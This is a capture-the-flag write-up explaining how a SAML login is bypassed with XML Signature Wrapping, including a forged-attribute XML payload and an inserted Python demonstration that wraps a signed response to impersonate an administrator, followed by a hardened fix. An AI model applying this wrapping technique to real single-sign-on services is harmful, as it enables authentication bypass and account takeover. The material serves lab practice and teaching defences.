Abaga CTF 2/4 – ambarinn

This post is part of the Ambaga CTF series, which involves four puzzles to solve, aka hack. The second challenge is the bar ambarinn. Let's get hacking 🧑‍💻

Welcome to ambakari

If you are wondering what this is all about check out my previous post on this CTF challenge.

Ambarinn is famous for a specific cocktail, but it's only available to a select few. All we know is that Adminmann is part of that exclusive group.

Recon

The recon steps are basically the same for all of these challenges so check out ambakari for the recon.

Spoiler Alert!

I’ve made the following collapsible so you don’t see anything accidentally. If you plan to do the challenge, look away now and come back when you’re done. Or, if you get stuck, you can always take a peek… I won’t tell! 🙊

🔓 My Solutions 🔓

To begin with, I’ve gone through the tools and such in ambakari, so please read that first so this makes sense.

Let's begin. It is the same login form, and basically the same overview screen after logging into ambarinn. It has the secret cocktail, but we can’t see it because we are not an administrator. What are we to do?

So first we try the same method as before, but we find out that a signature is most definitely required, as we get the error message “Authentication error: Expected to find XML element Signature in {urn:oasis:names:tc:SAML:2.0:protocol}Response”.

So a Signature is needed, and we can’t mess with the signed message, because if we change that the signature will no longer match. But take special note that the contents of the Signature element are not part of what is signed: an enveloped XML signature strips the ds:Signature element out before hashing, so anything we put in there is up for grabs. This is the classic XML Signature Wrapping (SW) vulnerability. So we might try putting the user info inside the Signature, between </KeyInfo> and </Signature>, and sending it off:

XML
...</KeyInfo>
    <Attribute Name="UserSSN" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" FriendlyName="Kennitala">
        <AttributeValue xsi:type="xsd:string">9876543210</AttributeValue>
    </Attribute>
    <Attribute Name="Name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic" FriendlyName="Nafn">
        <AttributeValue xsi:type="xsd:string">Adminmann Adminmannsson</AttributeValue>
    </Attribute>
</Signature>...

That goes through, but we are still logged in as Testmann. This is because the application walks the document in order and picks up the first UserSSN it finds, which is the genuine one inside the Assertion, before it ever reaches our copy inside the Signature. How can we fix that? Well, <Signature> does not have to be at the bottom: the enveloped-signature transform removes the whole element before verification, so its position inside <Response> makes no difference to the signature check. We can move <Signature></Signature> as a whole and put it between <Response> and <Issuer>, so that our attributes come first in document order.
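To make the two attempts concrete, here is an added example (my own constructed code, not the CTF's or the author's): a toy service that verifies an enveloped signature over the Response the way a real XML-DSig verifier does (the ds:Signature subtree is excluded before hashing, with an HMAC standing in for the IdP's RSA key) and then reads attributes in document order. The element names and namespaces are the real SAML/XML-DSig ones; the key, the issuer URL, the Testmann identity and the verifier logic are constructed for the demo. It shows the first attempt (attributes after KeyInfo, Signature left at the bottom) still yielding Testmann, the second (Signature moved to the front) yielding Adminmann, editing the Assertion directly failing the signature check, and a hardened extractor that only reads the signed Assertion.

```python
"""Toy XML Signature Wrapping demo against a SAML Response (constructed, not the CTF's code)."""
import hashlib
import hmac
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import Element, SubElement, tostring

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
DS = "http://www.w3.org/2000/09/xmldsig#"
ATTR_FMT = "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
for prefix, uri in (("samlp", SAMLP), ("saml", SAML), ("ds", DS)):
    ET.register_namespace(prefix, uri)

IDP_KEY = b"constructed-idp-key"  # assumption: HMAC key stands in for the IdP's RSA key


def q(ns, local):
    return "{%s}%s" % (ns, local)


def signed_bytes(resp):
    # Enveloped-signature transform + C14N, as a real verifier does it: the ds:Signature subtree
    # is dropped before hashing, so neither its position nor anything inside it is covered.
    return ET.canonicalize(tostring(resp), exclude_tags=[q(DS, "Signature")]).encode()


def add_attribute(parent, name, value):
    attr = SubElement(parent, q(SAML, "Attribute"), Name=name, NameFormat=ATTR_FMT)
    SubElement(attr, q(SAML, "AttributeValue")).text = value


def idp_response(ssn, name):
    """IdP side: Response with one Assertion, then an enveloped ds:Signature as the last child."""
    resp = Element(q(SAMLP, "Response"))
    SubElement(resp, q(SAML, "Issuer")).text = "https://idp.example.test"  # constructed
    stmt = SubElement(SubElement(resp, q(SAML, "Assertion")), q(SAML, "AttributeStatement"))
    add_attribute(stmt, "UserSSN", ssn)
    add_attribute(stmt, "Name", name)
    sig = SubElement(resp, q(DS, "Signature"))
    SubElement(sig, q(DS, "SignedInfo"))  # Reference/Transforms elided in this toy
    mac = hmac.new(IDP_KEY, signed_bytes(resp), hashlib.sha256).hexdigest()
    SubElement(sig, q(DS, "SignatureValue")).text = mac
    SubElement(sig, q(DS, "KeyInfo")).text = "idp-certificate"
    return tostring(resp)


def verify_signature(resp):
    sig = resp.find(q(DS, "Signature"))  # any child position is accepted, as in the challenge
    if sig is None:
        raise PermissionError("Expected to find XML element Signature in %s" % q(SAMLP, "Response"))
    expected = hmac.new(IDP_KEY, signed_bytes(resp), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig.findtext(q(DS, "SignatureValue")) or ""):
        raise PermissionError("signature does not match")


def attributes_vulnerable(resp):
    """The bug: first saml:Attribute per Name anywhere in the document, in document order."""
    found = {}
    for attr in resp.iter(q(SAML, "Attribute")):
        found.setdefault(attr.get("Name"), attr.findtext(q(SAML, "AttributeValue")))
    return found


def attributes_hardened(resp):
    """Fix: read attributes only from the single saml:Assertion that is a direct (signed) child."""
    assertions = resp.findall(q(SAML, "Assertion"))
    if len(assertions) != 1:
        raise PermissionError("expected exactly one Assertion")
    path = "%s/%s" % (q(SAML, "AttributeStatement"), q(SAML, "Attribute"))
    return {a.get("Name"): a.findtext(q(SAML, "AttributeValue")) for a in assertions[0].findall(path)}


def login(xml_bytes, extract):
    """Service side: verify the signature, then extract identity attributes; None if rejected."""
    resp = ET.fromstring(xml_bytes)
    try:
        verify_signature(resp)
        return extract(resp)
    except PermissionError:
        return None


def edit_assertion(signed_xml, name):
    """Naive tampering: change the Name inside the signed Assertion (breaks the signature)."""
    resp = ET.fromstring(signed_xml)
    for attr in resp.find(q(SAML, "Assertion")).iter(q(SAML, "Attribute")):
        if attr.get("Name") == "Name":
            attr.find(q(SAML, "AttributeValue")).text = name
    return tostring(resp)


def wrap(signed_xml, ssn, name, signature_first):
    """Signature wrapping: inject attributes after ds:KeyInfo, optionally move ds:Signature first."""
    resp = ET.fromstring(signed_xml)
    sig = resp.find(q(DS, "Signature"))
    add_attribute(sig, "UserSSN", ssn)
    add_attribute(sig, "Name", name)
    if signature_first:
        resp.remove(sig)
        resp.insert(0, sig)  # between <Response> and <Issuer>, as in the post
    return tostring(resp)


TESTMANN = idp_response("0123456789", "Testmann Testmannsson")  # constructed sample response
```

Running `login(wrap(TESTMANN, "9876543210", "Adminmann Adminmannsson", signature_first=True), attributes_vulnerable)` returns the Adminmann identity while the signature still verifies, because the verifier and the attribute extractor disagree about which part of the document is authoritative; `attributes_hardened` resolves that by reading only the signed Assertion.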

Then we can send it off again

We did it, we are in! 🍸 ⛳️ ✅
Just look at the delicious-looking cocktail and our flag, which we can use to mark the challenge as completed. If you want to see it yourself, you will just have to do the challenge 😉